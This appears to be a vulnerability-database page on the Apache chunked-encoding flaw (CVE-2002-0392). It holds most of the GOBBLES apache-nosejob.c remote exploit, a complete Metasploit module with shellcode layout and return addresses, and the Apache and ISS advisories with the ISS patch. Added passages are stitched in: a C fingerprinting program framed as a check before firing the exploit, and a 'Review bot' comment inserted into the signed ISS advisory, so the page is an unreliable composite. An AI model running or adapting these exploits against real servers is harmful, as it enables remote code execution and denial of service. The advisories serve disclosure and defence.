	{ "OpenBSD 3.0 x86 / Apache 1.3.24 #2",		 -146,	0x98a00,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.20",		 -146,	0x8f2a6,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.23",		 -146,	0x90600,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24",		 -146,	0x9011a,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",		 -146,	0x932ae,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146,	0x1d7a00,  6, 36 },
	{ "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)",	 -90,	0x80eda00,  5, 42 },
	{ "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", 	 -90,   0x80efa00,  5, 42 },
	{ "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", 	 -90,   0x80efa00,  5, 42 },	
	{ "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)",	 -90,	0x80efa00,  5, 42 }, 
	{ "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)",	 -90,	0x80efa00,  5, 42 },
}, victim;



void usage(void) {
	int i;

	printf("GOBBLES Security Labs\t\t\t\t\t- apache-nosejob.c\n\n");
	printf("Usage: ./apache-nosejob <-switches> -h host[:80]\n");
	printf("  -h host[:port]\tHost to penetrate\n");
	printf("  -t #\t\t\tTarget id.\n");
	printf("  Bruteforcing options (all required, unless -o is used!):\n");
	printf("  -o char\t\tDefault values for the following OSes\n");
	printf("  \t\t\t(f)reebsd, (o)penbsd, (n)etbsd\n");
	printf("  -b 0x12345678\t\tBase address used for bruteforce\n");
	printf("  \t\t\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\n");
	printf("  -d -nnn\t\tmemcpy() delta between s1 and addr to overwrite\n");
	printf("  \t\t\tTry -146/obsd, -150/fbsd, -90/nbsd.\n");
	printf("  -z #\t\t\tNumbers of time to repeat \\0 in the buffer\n");
	printf("  \t\t\tTry 36 for openbsd/freebsd and 42 for netbsd\n");
	printf("  -r #\t\t\tNumber of times to repeat retadd in the buffer\n");
	printf("  \t\t\tTry 6 for openbsd/freebsd and 5 for netbsd\n");
	printf("  Optional stuff:\n");
	printf("  -w #\t\t\tMaximum number of seconds to wait for shellcode reply\n");
	printf("  -c cmdz\t\tCommands to execute when our shellcode replies\n");
	printf("  \t\t\taka auto0wncmdz\n");
	printf("\nExamples will be published in upcoming apache-scalp-HOWTO.pdf\n");
	printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
	printf(" ID / Return addr / Target specification\n");
	for(i = 0; i < sizeof(targets)/sizeof(victim); i++)
		printf("% 3d /  0x%.8lx / %s\n", i, targets[i].retaddr, targets[i].type);

	exit(1);
}


int main(int argc, char *argv[]) {
	char *hostp, *portp, *cmdz = DEFAULT_CMDZ;
	u_char buf[512], *expbuf, *p;
	int i, j, lport, sock;
	int bruteforce, owned, progress, sc_timeout = 5;
	int responses, shown_length = 0;
	struct in_addr ia;
	struct sockaddr_in sin, from;
	struct hostent *he;


	if(argc < 4)
		usage();

	bruteforce = 0;
	memset(&victim, 0, sizeof(victim));
	while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) {
		switch(i) {
			/* required stuff */
			case 'h':
			hostp = strtok(optarg, ":");
			if((portp = strtok(NULL, ":")) == NULL)
				portp = "80";
			break;

			/* predefined targets */
			case 't':
			if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
				printf("Invalid target\n");
				return -1;
			}

			memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));
			break;

			/* bruteforce! */
			case 'b':
			bruteforce++;
			victim.type = "Custom target";
			victim.retaddr = strtoul(optarg, NULL, 16);
			printf("Using 0x%lx as the base address while bruteforcing..\n", victim.retaddr);
			break;

			case 'd':
			victim.delta = atoi(optarg);
			printf("Using %d as delta\n", victim.delta);
			break;

			case 'r':
			victim.repretaddr = atoi(optarg);
			printf("Repeating the return address %d times\n", victim.repretaddr);
			break;

			case 'z':
			victim.repzero = atoi(optarg);
			printf("Number of zeroes will be %d\n", victim.repzero);
			break;

			case 'o':
			bruteforce++;
			switch(*optarg) {
				case 'f':
				victim.type = "FreeBSD";
				victim.retaddr = 0x80a0000;
				victim.delta = -150;
				victim.repretaddr = 6;
				victim.repzero = 36;
				break;

				case 'o':
				victim.type = "OpenBSD";
				victim.retaddr = 0x80000;
				victim.delta = -146;
				victim.repretaddr = 6;
				victim.repzero = 36;
				break;

				case 'n':
				victim.type = "NetBSD";
				victim.retaddr = 0x080e0000;
				victim.delta = -90;
				victim.repretaddr = 5;
				victim.repzero = 42;
				break;

				default:
				printf("[-] Better luck next time!\n");
				break;
			}
			break;

			/* optional stuff */
			case 'w':
			sc_timeout = atoi(optarg);
			printf("Waiting maximum %d seconds for replies from shellcode\n", sc_timeout);
			break;

			case 'c':
			cmdz = optarg;
			break;

			default:
			usage();
			break;
		}
	}

	if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {
		printf("[-] Incomplete target. At least 1 argument is missing (nmap style!!)\n");
		return -1;
	}

	printf("[*] Resolving target host.. ");
	fflush(stdout);
	he = gethostbyname(hostp);
	if(he)
		memcpy(&ia.s_addr, he->h_addr, 4);
	else if((ia.s_addr = inet_addr(hostp)) == INADDR_NONE) {	/* inet_addr() reports failure as INADDR_NONE, not INADDR_ANY */
		printf("There'z no %s on this side of the Net!\n", hostp);
		return -1;
	}

	printf("%s\n", inet_ntoa(ia));


	srand(getpid());
	signal(SIGPIPE, SIG_IGN);
	for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
		/* skip return addresses containing CR or LF, which would terminate the header line */
		if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
			continue;


		sock = socket(PF_INET, SOCK_STREAM, 0);
		sin.sin_family = PF_INET;
		sin.sin_addr.s_addr = ia.s_addr;
		sin.sin_port = htons(atoi(portp));
		if(!progress)
			printf("[*] Connecting.. ");

		fflush(stdout);
		if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
			perror("connect()");
			exit(1);
		}

		if(!progress)
			printf("connected!\n");


		p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
				    + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero
				    + 1024) * REP_POPULATOR));

		PUT_STRING("GET / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");

		for (i = 0; i < REP_SHELLCODE; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_3, PADDING_3);
			PUT_STRING(": ");
			PUT_BYTES(NOPCOUNT, NOP);
			memcpy(p, shellcode, sizeof(shellcode) - 1);
			p += sizeof(shellcode) - 1;
			PUT_STRING("\r\n");
		}

		for (i = 0; i < REP_POPULATOR; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_1, PADDING_1);
			PUT_STRING(": ");
			for (j = 0; j < victim.repretaddr; j++) {
				*p++ = victim.retaddr & 0xff;
				*p++ = (victim.retaddr >> 8) & 0xff;
				*p++ = (victim.retaddr >> 16) & 0xff;
				*p++ = (victim.retaddr >> 24) & 0xff;
			}

			PUT_BYTES(victim.repzero, 0);
			PUT_STRING("\r\n");
		}

		PUT_STRING("Transfer-Encoding: chunked\r\n");
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
		PUT_STRING(buf);
		PUT_BYTES(PADSIZE_2, PADDING_2);
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
		PUT_STRING(buf);
		
		if(!shown_length) {
			printf("[*] Exploit output is %u bytes\n", (unsigned int)(p - expbuf));
			shown_length = 1; 
		}
		
		write(sock, expbuf, p - expbuf);

		progress++;
		if((progress%70) == 0)
			progress = 1;

		if(progress == 1) {
			printf("\r[*] Currently using retaddr 0x%lx", victim.retaddr);
			for(i = 0; i < 40; i ++)
				printf(" ");
			printf("\n");
			if(bruteforce)
				putchar(';');
		}
		else
			putchar(((rand()>>8)%2)? 'P': 'p');


		fflush(stdout);
		responses = 0;
		while (1) {
			fd_set          fds;
			int             n;
			struct timeval  tv;

			tv.tv_sec = sc_timeout;
			tv.tv_usec = 0;

			FD_ZERO(&fds);
			FD_SET(0, &fds);
			FD_SET(sock, &fds);
	
			memset(buf, 0, sizeof(buf));
			if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
				if(FD_ISSET(sock, &fds)) {
					if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
						break;

					if(n >= 1)
					{
						if(!owned)
						{
							for(i = 0; i < n; i ++)
								if(buf[i] == 'G')
									responses ++;
								else
									responses = 0;
							if(responses >= 2)
							{
								owned = 1;
								write(sock, "O", 1);
								write(sock, cmdz, strlen(cmdz));
								printf(" it's a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\n", victim.type, victim.delta, victim.retaddr, victim.repretaddr, victim.repzero);
								printf("Experts say this isn't exploitable, so nothing will happen now: ");
								fflush(stdout);
							}
						} else
  							write(1, buf, n);
  					}
				}

				if(FD_ISSET(0, &fds)) {
					if((n = read(0, buf, sizeof(buf) - 1)) < 0)
						exit(1);

					write(sock, buf, n);
				}

			}

			if(!owned)
				break;
		}

		free(expbuf);
		close(sock);

		if(owned)
			return 0;

		if(!bruteforce) {
			fprintf(stderr, "Ooops.. hehehe!\n");
			return -1;
		}
	}

	return 0;
}
		

- Vulnerability Information (F82996)

Apache Win32 Chunked Encoding (PacketStormID:F82996)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit
windows
CVE-2002-0392

This Metasploit module exploits the chunked transfer integer wrap vulnerability in Apache version 1.2.x to 1.3.24. This particular module has been tested with all versions of the official Win32 build between 1.3.9 and 1.3.24. Additionally, it should work against most co-branded and bundled versions of Apache (Oracle 8i, 9i, IBM HTTPD, etc). You will need to use the Check() functionality to determine the exact target version prior to launching the exploit. The version of Apache bundled with Oracle 8.1.7 will not automatically restart, so if you use the wrong target value, the server will crash.
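A fingerprint check of the kind the description says to run before firing, as an added example that is neither the module's own check() nor Metasploit code: it pulls the Server: header out of a raw response and reports whether the advertised Apache version falls in the 1.2.0 to 1.3.24 range the module targets. The responses are constructed for the example; a server that hides its version yields "unknown", which is exactly the case where the Oracle 8.1.7 warning above applies and a blind shot can take the service down.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Copy the value of header `name` (case-insensitive, must begin a line)
 * from a raw HTTP response into out, without the trailing CR/LF.
 * Returns 1 if found, 0 otherwise. */
static int header_value(const char *resp, const char *name, char *out, size_t outsz)
{
    size_t n = strlen(name);
    const char *p = resp;
    while ((p = strchr(p, '\n')) != NULL) {
        size_t i;
        p++;                                    /* start of the next line */
        for (i = 0; i < n && p[i] != '\0'; i++)
            if (tolower((unsigned char)p[i]) != tolower((unsigned char)name[i]))
                break;
        if (i == n && p[n] == ':') {
            const char *v = p + n + 1, *e;
            size_t len;
            while (*v == ' ' || *v == '\t')
                v++;
            e = v + strcspn(v, "\r\n");
            len = (size_t)(e - v);
            if (len >= outsz)
                len = outsz - 1;
            memcpy(out, v, len);
            out[len] = '\0';
            return 1;
        }
    }
    return 0;
}

/* Find "Apache/x.y.z" anywhere in a Server: value. Returns 1 on success;
 * a bare "Apache" or a two-component version is treated as unknown. */
static int apache_version(const char *server, int *maj, int *min, int *patch)
{
    const char *a = strstr(server, "Apache/");
    return a != NULL && sscanf(a + 7, "%d.%d.%d", maj, min, patch) == 3;
}

/* Range the module description gives: 1.2.x through 1.3.24 inclusive. */
static int in_module_range(int maj, int min, int patch)
{
    long v = maj * 1000000L + min * 1000L + patch;
    return v >= 1002000L && v <= 1003024L;
}

/* 1: Apache in the targeted range. 0: another server, or Apache outside it.
 * -1: no Server: header or no version string; since a wrong target can
 * crash the bundled Oracle builds, treat this as "do not fire". */
static int classify_response(const char *resp)
{
    char server[256];
    int maj, min, patch;
    if (!header_value(resp, "Server", server, sizeof server))
        return -1;
    if (strstr(server, "Apache") == NULL)
        return 0;
    if (!apache_version(server, &maj, &min, &patch))
        return -1;
    return in_module_range(maj, min, patch) ? 1 : 0;
}

/* Constructed responses for the example; none were captured from a live host.
 * The second uses the Oracle 8.1.7 banner listed in the module's comments. */
static const char *const sample_responses[] = {
    "HTTP/1.1 200 OK\r\nServer: Apache/1.3.24 (Win32)\r\nContent-Length: 0\r\n\r\n",
    "HTTP/1.1 200 OK\r\nserver: Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24\r\n\r\n",
    "HTTP/1.1 200 OK\r\nServer: Apache/1.3.26 (Win32)\r\n\r\n",
    "HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n",
    "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n\r\n",
    "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n",
};

int main(void)
{
    static const char *const verdict[] = { "unknown", "not targeted", "in range" };
    size_t i;
    for (i = 0; i < sizeof sample_responses / sizeof sample_responses[0]; i++) {
        char server[256];
        if (!header_value(sample_responses[i], "Server", server, sizeof server))
            strcpy(server, "(no Server header)");
        printf("%-12s  %s\n", verdict[classify_response(sample_responses[i]) + 1], server);
    }
    return 0;
}
```

To use it against a real host, send a HEAD / request over a socket and feed the raw reply to classify_response(); only a 1 verdict justifies selecting a fixed-address target, and anything else belongs with the "Windows Generic Bruteforce" target or with not firing at all.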

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Apache Win32 Chunked Encoding',
			'Description'    => %q{
				This module exploits the chunked transfer integer wrap
				vulnerability in Apache version 1.2.x to 1.3.24. This
				particular module has been tested with all versions of the
				official Win32 build between 1.3.9 and 1.3.24. Additionally,
				it should work against most co-branded and bundled versions
				of Apache (Oracle 8i, 9i, IBM HTTPD, etc).

				You will need to use the Check() functionality to determine
				the exact target version prior to launching the exploit. The
				version of Apache bundled with Oracle 8.1.7 will not
				automatically restart, so if you use the wrong target value,
				the server will crash.
			},
			'Author'         => 'hdm',
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-0392' ],
					[ 'OSVDB', '838'],
					[ 'BID', '5033' ],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],

				],
			'Privileged'     => true,
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space'    => 987,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'MinNops'  => 200,
					'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",

				},
			'Targets'        => 
				[
					[  'Windows Generic Bruteforce', {} ],

					# Official Apache.org win32 builds
					[  'Apache.org Build 1.3.9->1.3.19', 
						{
							'Ret' => 0x00401151, 
							'Pad' => [6,2,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22->1.3.24', 
						{
							'Ret' => 0x00401141, 
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.19->1.3.24', 
						{
							'Ret' => 0x6ff6548d,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22',
						{
							'Ret' => 0x6ff762ac,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call ebx
					[  'Apache.org Build 1.3.17->1.3.24 (Windows 2000)',
						{
							'Ret' => 0x1c0f13e5,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call esi
					[  'Apache.org Build 1.3.17->1.3.24 (Windows NT)',
						{
							'Ret' => 0x1c0f1033,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Interesting return to PEB trick for Windows 2003 systems...
					[  'Windows 2003 English SP0',
						{
							'Ret' => 0x7ffc0638,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Pop/Pop/Return on Windows 2000 
					[  'Windows 2000 English',
						{
							'Ret' => 0x75022ac4,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Oracle HTTPD: [ 8.1.7 ] (one shot)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 8.1.7 Apache 1.3.12',
						{
							'Ret' => 0x1d84d42c,
							'Pad' => [7]
						}
					],

					# Oracle HTTPD: [ 9.1.0 ] (multiple shots)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 9.1.0 Apache 1.3.12',
						{
							'Ret' => 0x10016061,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Oracle HTTPD: [ 9.2.0 ] (multiple shots)
					# Oracle HTTP Server Powered by Apache/1.3.22 (Win32)
					# mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b
					# mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
					[  'Oracle 9.2.0 Apache 1.3.22',
						{
							'Ret' => 0x6ff6427a,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Generic debugging targets
					[  'Debugging Target',
						{
							'Ret' => 0xcafebabe,
							'Pad' => [0,1,2,3,4,5,6,7]
						}
					]
				],
			'DisclosureDate' => 'Jun 19 2002',
			'DefaultTarget'  => 0))
	end

	def check
		response = send_request_raw({'uri' => '/'}, 5)

		if response.nil?
			print_status("No response to request")
			return Exploit::CheckCode::Safe 
		end

		code = Exploit::CheckCode::Appears

		case response['Server']
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
				print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
				print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
			when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
				print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
			when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
				print_status("IBM backported the patch, this system is not vulnerable")
				code = Exploit::CheckCode::Safe
			when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
			else
				code = Exploit::CheckCode::Safe
		end

		if code == Exploit::CheckCode::Appears
			print_status("Vulnerable server: #{response['Server']}")
		else
			print_status("Server is probably not vulnerable: #{response['Server']}")
		end

		return code
	end

	def exploit
		if target_index == 0
			targets.each_with_index { |targ, idx|
				next if idx == 0

				exploit_target(targ)
			}
		else
			exploit_target(target)
		end
	end

	def exploit_target(target)
		target['Pad'].each { |pad|
			pattern = 
				rand_text_alphanumeric(3936) + 
				payload.encoded + 
				make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
				rand_text_alphanumeric(pad)

			# Move slightly further back to allow padding changes
			pattern +=
				"\xeb\xf0\xde\xad" +
				[target.ret].pack('V')

			# Create a chain of return addresses and reverse jumps
			254.times { |x|
				pattern +=
					"\xeb\xf6\xbe\xef" +
					[target.ret].pack('V')
			}

			# Even out the request length based on the padding value
			# This is required to reliably hit the return address offset
			pattern += rand_text_alphanumeric(8 - pad)

			#
			# Regardless of what return we hit, execution jumps backwards to the shellcode:
			#                                   _______________ _______________ ___________
			#       _________    _____________  | ________    | | ______      | | ______
			#       v       |    v           |  v v      |    | v v    |      | v v    |
			# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
			#
		
			print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")

			# Build the request
			send_request_raw({
				'uri'     => '/',
				'headers' => 
					{
						'Transfer-Encoding' => "CHUNKED"
					},
				'data'    => "FFFFFFF0 " + pattern,
			}, 2)

			# Check the handler
			handler
		}
	end

end
    

- Vulnerability information (F26283)

apache-chunked.txt (PacketStormID:F26283)
2002-06-19 00:00:00
Mark Litchfield, Apache developers  httpd.apache.org
CVE-2002-0392

Apache Advisory - A vulnerability found in the chunked encoding implementation of the Apache 1.3.24 and 2.0.36 and below servers can under some conditions be used to remotely execute code on systems running this software.

-----BEGIN PGP SIGNED MESSAGE----- 

Date: June 17, 2002 
Product: Apache Web Server 
Versions: Apache 1.3 all versions including 1.3.24, Apache 2 all versions 
up to 2.0.39 

Introduction: 

While testing for Oracle vulnerabilities, Mark Litchfield discovered a 
denial of service attack for Apache on Windows. Investigation by the 
Apache Software Foundation showed that this issue has a wider scope, which 
on some platforms results in a denial of service vulnerability, while on 
some other platforms presents a potential remote exploit vulnerability. 

We were also notified today by ISS that they had published the same issue 
which has forced the early release of this advisory. 

The Common Vulnerabilities and Exposures project (cve.mitre.org) has 
assigned the name CAN-2002-0392 to this issue. 

Description: 

Versions of the Apache web server up to and including 1.3.24 and 2.0 up to 
and including 2.0.36 and 2.0.36-dev versions contain a bug in the routines 
which deal with invalid requests which are encoded using chunked encoding. 
This bug can be triggered remotely by sending a carefully crafted invalid 
request. This functionality is enabled by default. 

In most cases the outcome of the invalid request is that the child process 
dealing with the request will terminate. At the least, this could help a 
remote attacker launch a denial of service attack as the parent process 
will eventually have to replace the terminated child process and starting 
new children uses non-trivial amounts of resources. 

On the Windows and Netware platforms, Apache runs one multithreaded child 
process to service requests. The teardown and subsequent setup time to 
replace the lost child process presents a significant interruption of 
service. As the Windows and Netware ports create a new process and reread 
the configuration, rather than fork a child process, this delay is much 
more pronounced than on other platforms. 

In Apache 2.0 the error condition is correctly detected, so it will not 
allow an attacker to execute arbitrary code on the server. However 
platforms could be using a multithreaded model of multiple concurrent 
requests per child process (although the default preference remains 
multiple processes with a single thread and request per process, and most 
multithreaded models continue to create multiple child processes). Using 
any multithreaded model, all concurrent requests currently served by the 
affected child process will be lost. 

In Apache 1.3 the issue causes a stack overflow. Due to the nature of the 
overflow on 32-bit Unix platforms this will cause a segmentation violation 
and the child will terminate. However on 64-bit platforms the overflow 
can be controlled and so for platforms that store return addresses on the 
stack it is likely that it is further exploitable. This could allow 
arbitrary code to be run on the server as the user the Apache children are 
set to run as. 

We have been made aware that Apache 1.3 on Windows is exploitable in this 
way. 

Please note that the patch provided by ISS does not correct this 
vulnerability. 

The Apache Software Foundation are currently working on new releases that 
fix this issue, please see http://httpd.apache.org/ for updated 
versions. 

-----BEGIN PGP SIGNATURE----- 
Version: PGP 6.5.8 

iQCVAwUBPQ4aj+6tTP1JpWPZAQHIDwP/UrFoCphthG1gd82ZaAQT0hjCaExlFaM2 
p8BY5P6JS7VrRlzUoGd/7GRBF9o7foNpgFlANx1NNttr8FhHqlRbFBZH6u1FmTpY 
4zGq7GKFuZiiAKWaCaCFcpIQguJ1vlrJc49E9k9jvJhuyzh/0Jz/Lj/wAFgmctqm 
6Q7MwIcb1bk= 
=fZnx 
-----END PGP SIGNATURE----- 
    

- Vulnerability information (F26282)

apache-chunked-xforce.txt (PacketStormID:F26282)
2002-06-19 00:00:00
ISS  iss.net
CVE-2002-0392

ISS reported a vulnerability found in the chunked encoding implementation of the Apache 1.3.24 and 2.0.36 and below servers that under some conditions can be used to remotely execute code on systems running this software. Note that the patch supplied by ISS, which is included in this advisory, does not fix this vulnerability.

-----BEGIN PGP SIGNED MESSAGE----- 

Internet Security Systems Security Advisory 
June 17, 2002 

Remote Compromise Vulnerability in Apache HTTP Server 

Synopsis: 

ISS X-Force has discovered a serious vulnerability in the default 
version of Apache HTTP Server. Apache is the most popular Web server and 
is used on over half of all Web servers on the Internet. It may be 
possible for remote attackers to exploit this vulnerability to 
compromise Apache Web servers. Successful exploitation may lead to 
modified Web content, denial of service, or further compromise. 

Affected Versions: 

Apache 1.x 

Note: Many commercial Web Application Servers such as Oracle 9ias and 
IBM Websphere use Apache HTTP Server to process HTTP requests. 
Additional products that bundle Apache HTTP Server for Windows may be 
affected. 

Description: 

The Apache HTTP Server is maintained by the Apache Software Foundation. 
Apache is an extremely popular open-source Web server. Netcraft 
(http://www.netcraft.com) reports that as of May 2002, Apache accounts 
for over 63% of all active Web sites. Apache's installed base is larger 
than all other Web servers combined. 

The Apache Project is an open-source and volunteer collaboration aimed 
to create and maintain a free, feature-rich, powerful, and secure Web 
server implementation. Apache is well regarded as the best, freely 
available Web server. 

Apache contains a flawed mechanism meant to calculate the size of 
"chunked" encoding. Chunked encoding is part of the HTTP Protocol 
Specification used for accepting data from Web users. When data is sent 
from the user, the Web server needs to allocate a memory buffer of a 
certain size to hold the submitted data. When the size of the data being 
submitted is unknown, the client or Web browser will communicate with 
the server by creating "chunks" of data of a negotiated size. 

The Apache HTTP Server has a software flaw that misinterprets the size 
of incoming data chunks. This error may lead to a signal race, heap 
overflow, and to exploitation of malicious code. 

X-Force has verified that this issue is exploitable on Apache for 
Windows (Win32) version 1.3.24. Apache 1.x for Unix contains the same 
source code, but X-Force believes that successful exploitation on most 
Unix platforms is unlikely. 

Recommendations: 

Internet Scanner X-Press Update 6.12 includes a check, 
ApacheChunkedEncodingBo, to detect installations of Apache HTTP Server 
for Win32. XPU 6.12 is available from the ISS Download Center at: 
http://www.iss.net/download. For questions about downloading and 
installing this XPU, email support@iss.net. 

Detection support for this attack will be included in future X-Press 
Updates for RealSecure Network Sensor 6.x and 7.0. These XPUs will be 
available from the ISS Download Center, and this alert will be updated 
when these updates become available. 

ISS X-Force has developed a patch for this issue. Follow the 
instructions below, or contact your vendor for assistance: 

To apply a source code patch to your Apache package: 

1. Locate your source directory and navigate into the "main" sub- 
directory. 
2. Verify that "http_protocol.c" is present in the current directory. 
3. To update your http_protocol.c file, create a file named 
"apache_patch.diff", containing the following text: 

- --- http_protocol.c.vuln Fri Jun 14 16:12:50 2002 
+++ http_protocol.c Fri Jun 14 16:13:47 2002 
@@ -2171,7 +2171,7 @@ 

     /* Otherwise, we are in the midst of reading a chunk of data */ 

- - len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining; 
+ len_to_read = (r->remaining > (unsigned int)bufsiz) ? bufsiz : r-> 
remaining; 

     len_read = ap_bread(r->connection->client, buffer, len_to_read); 
     if (len_read <= 0) { 
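Review bot: The cast on the `+` line only changes how the comparison is evaluated; it never rejects a bad length. If the comparison comes out false, `len_to_read` is still assigned `r->remaining` unchanged and handed straight to `ap_bread()`. Whether the cast makes a negative `r->remaining` compare as a large unsigned value (true, clamped to `bufsiz`) or leaves the comparison signed depends on the width of `r->remaining`, which this hunk does not show, and on any platform where the comparison stays signed the negative value flows through untouched. The Apache advisory reproduced above says plainly that this ISS patch does not correct the vulnerability; the check belongs at the point where the chunk size is parsed, rejecting a length that is negative or exceeds the buffer as a protocol error before any read is attempted, instead of clamping in this branch. Separately, the hunk will not apply with `patch` as pasted: PGP clear-signing has dash-escaped the file header and the removed line (`- --- http_protocol.c.vuln`, `- - len_to_read = ...`), and the added line has been wrapped after `r->` onto a second line, so both must be undone first.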

4. Apply the source code update using the "patch" command, or a similar 
   utility. 
5. Build new binaries and reinstall. 

The Apache Server Project has been notified and will make a formal patch 
available soon. Please refer to the Apache Server Project's homepage for 
more information: http://httpd.apache.org/ 

Additional Information: 

http://www.iss.net/security_center 
http://www.apache.org 
http://httpd.apache.org/ 

Credits: 

This vulnerability was discovered and researched by Neel Mehta of the 
ISS X-Force. 

______ 

About Internet Security Systems (ISS) 
Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a 
pioneer and world leader in software and services that protect critical 
online resources from an ever-changing spectrum of threats and misuse. 
Internet Security Systems is headquartered in Atlanta, GA, with 
additional operations throughout the Americas, Asia, Australia, Europe 
and the Middle East. 

Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved 
worldwide. 

Permission is hereby granted for the electronic redistribution of this 
document. It is not to be edited or altered in any way without the 
express written consent of the Internet Security Systems X-Force. If you 
wish to reprint the whole or any part of this document in any other 
medium excluding electronic media, please email xforce@iss.net for 
permission. 

Disclaimer: The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS 
condition. There are NO warranties, implied or otherwise, with regard to 
this information or its use. Any use of this information is at the 
user's risk. In no event shall the author/distributor (Internet Security 
Systems X-Force) be held liable for any damages whatsoever arising out 
of or in connection with the use or spread of this information. 

X-Force PGP Key available on MIT's PGP key server and PGP.com's key 
server, as well as at http://www.iss.net/security_center/sensitive.php 

Please send suggestions, updates, and comments to: X-Force 
xforce@iss.net of Internet Security Systems, Inc. 

-----BEGIN PGP SIGNATURE----- 
Version: 2.6.2 

iQCVAwUBPQ4GqzRfJiV99eG9AQHAAQQArA9Xso3VW2fdkUYjyu/mjzji6d13ekEw 
o13+G231veDDNdA6dy3QB5JxrspUehzIIvp2Ceo5ZjegBZVEJW0VnnOJ8FsnY6Uj 
wArq9Je2r2X55AYOWIVCFtlfcKtON68couPaMumldWcLBQ+ktJCY7oygydXFfs19 
6iBtJDMKucs= 
